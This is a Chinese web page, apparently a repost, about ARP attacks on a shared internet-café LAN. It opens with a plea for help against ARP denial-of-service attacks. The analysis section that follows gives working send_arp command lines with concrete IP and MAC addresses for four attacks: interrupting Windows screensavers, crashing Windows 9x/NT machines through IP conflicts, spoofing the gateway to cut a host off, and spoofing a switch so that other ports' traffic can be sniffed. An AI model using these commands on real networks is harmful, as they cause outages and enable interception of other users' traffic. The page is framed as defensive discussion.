我一个朋友的网吧最近遭受一种奇怪的攻击，他网吧一共有60台机器，和另外6个网吧并在一个网段中，IP地址从192.168.0.1～192.168.0.255，大家共用CS服务器和WEB及流媒体服务器，其中一台CS服务器和流媒体服务器在他网吧里。
最近每晚和中午，他网吧客满的时候，就有人在网内对他网吧的IP段进行攻击。表现是大面积IP地址冲突，造成机器暂时停止网络响应，而且网络中的CS服务器和流媒体服务器马上停止响应。一般持续半小时以上，IP冲突的速度大约10秒一次。连续几天都是如此，造成他很大损失。

我朋友求助于我，于是我先试验了一下，证明故意修改IP的方式是无法造成服务器失去响应的，于是我在他网吧两台机器上安装了一些监测软件，试图捕捉对方的攻击数据包，然后再取得对方的MAC地址来查找攻击来源。由于主要表现是IP冲突，所以我使用commview3专门捕捉所有的ARP协议包，结果在晚上对方攻击时果然发现出现了大量有规律的ARP广播包，那些包明显是某种软件生成的，MAC地址是随机伪造的，IP地址就是他网吧的系列IP，这种包和一般开机的包不同，是pass-thourgh包，机器收到后98系统马上失去网络响应，只有等很长时间或者重起，2K系统也马上失去响应，必须点确定才能恢复，但是所有连接的用户都Time Out了。

由于包里MAC地址是伪造的，所以我无法查到来源，于是我去网上查找了一些资料，证明这是一种ARP拒绝服务攻击，但是没找到任何有效防范办法，微软也没有相应的补丁。唯一的办法除非在网络中使用路由器屏蔽ARP，用硬件存储ARP列表，但是路由器不是一个小网吧可以承担的设备。当然如果划分网段，再用网关把他和大家隔开也可以，因为ARP只在一个网段传播，但是这样别人就无法共用他们的服务器，而且破坏者也可以到他网吧来继续破坏，这也是不行的。

我又试用了各种防火墙软件，证明也无法拦住这样的攻击包，没有一个防火墙产品可以屏蔽非法的ARP包。使用天网2.5和金山网镖，甚至用断开网络选项都无法挡住攻击。

我后来在网上找到了一个叫做“……”（为防止别有用心的人用来干坏事，我略去这个软件的名字，转贴者也就是本人注）的软件，果然可以达到这个效果，证明这样的攻击软件在网上是大量存在的，大家可以去google里搜索下载这个软件。

我现在唯一能告诉他的办法就是遇到攻击就拔网线，各位高手，还有没有什么低廉方便的手段能解决这个问题啊，我朋友都急死了，再这样他的网吧就做不下去了。

请大家帮帮忙！！谢谢：）

分析:
网上关于ARP的资料已经很多了，就不用我都说了。
用某一位高手的话来说，“我们能做的事情很多，唯一受
限制的是我们的创造力和想象力”。

ARP也是如此。

以下讨论的机子有
一个要攻击的机子：10.5.4.178
硬件地址：52:54:4C:98:EE:2F
我的机子： :10.5.3.69
硬件地址：52:54:4C:98:ED:C5
网关： 10.5.0.3
硬件地址：00:90:26:3D:0C:F3
一台交换机另一端口的机子：10.5.3.3
硬件地址：52:54:4C:98:ED:F7

一：用ARP破WINDOWS的屏保
原理：利用IP冲突的级别比屏保高，当有冲突时，就会
跳出屏保。
关键：ARP包的数量适当。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 40

二：用ARP导致IP冲突，死机
原理：WINDOWS 9X，NT4在处理IP冲突时，处理不过来，导致死机。
注：对WINDOWS 2K，LINUX相当于flooding,只是比一般的FLOODING
有效的多.对LINUX，明显系统被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 999999999

三：用ARP欺骗网关，可导致局域网的某台机子出不了网关。
原理：用ARP应答包去刷新对应着要使之出不去的机子。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 \
10.5.4.178 00:90:26:3D:0C:F3 1
注意：如果单单如上的命令，大概只能有效几秒钟，网关机子里的ARP
高速缓存会被被攻击的机子正确刷新，于是只要...

四：用ARP欺骗交换机，可监听到交换机另一端的机子。
可能需要修改一下send_arp.c,构造如下的数据包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然后就可以sniffer了。
原理:
交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表
所以你可以先来个ARP 欺骗,然后就可以监听了

[1] [2] [3] [4] [5] [6] 下一页

上一篇:内网通信安全的九项技术措施

下一篇:局域网内Windows XP与Windows 98se的双向访问解决

防御局域网攻击 ZT 相关文章：

·局域网上网的安全防范与技巧

·《龙珠大冒险》攻击技巧研究（GBA） - 龙珠Z攻略秘籍 - 龙珠Z

防御局域网攻击 ZT 相关软件：

·完全精通局域网手册(PDF)

·海思食品饮料销售管理(单机/局域网/互联网版)V2.22.080111

·手机炸弹-短信息攻击懒人版

·实用局域网终极制作教程

·局域网的配置管理

·重返狼穴3：悍马攻击(Humvee Assault)

·WorkWin管理专家(企业局域网络监控软件) V9.01

·局域网设置视频教学 rar 献给电脑初学者一个帐号两个人用

·微点主动防御软件V1.2.10571.0080

·局域网共享设置梦想吧专用版

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot